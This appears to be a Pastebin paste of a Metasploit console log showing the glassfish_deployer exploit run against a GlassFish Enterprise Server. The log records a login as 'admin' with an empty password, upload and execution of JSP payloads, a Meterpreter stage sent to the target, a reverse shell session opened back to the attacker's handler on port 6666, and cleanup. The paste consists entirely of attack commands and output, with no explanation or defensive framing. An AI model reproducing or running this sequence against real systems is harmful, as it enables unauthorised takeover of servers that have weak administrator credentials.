Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- msf exploit(glassfish_deployer) > set target 0
- target => 0
- msf exploit(glassfish_deployer) > exploit -j
- [*] Exploit running as background job.
- [*] Started reverse handler on 10.0.0.104:6666
- [*] 10.0.0.112 - GlassFish Enterprise Server - Trying username:'admin' with password:''
- msf exploit(glassfish_deployer) > [+] 10.0.0.112 - GlassFish Enterprise Server - SUCCESSFUL login for 'admin' : ''
- [*] Attempting to automatically select a target...
- [*] Automatically selected target "Windows Universal"
- [*] Successfully uploaded
- [*] Executing /hxw33ENqIzV/nrqL2Ct0.jsp...
- [*] Sending stage (749056 bytes) to 10.0.0.112
- [*] Meterpreter session 1 opened (10.0.0.104:6666 -> 10.0.0.112:4383) at Tue Mar 01 01:02:57 -0500 2011
- [*] Executing /hxw33ENqIzV/XWy63KUbpo2fNV1Gv.jsp...
- [*] GlassFish Application cleanup complete.
- [*] Executing /hxw33ENqIzV/cleanup.jsp...
- [*] JSP cleanup complete.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement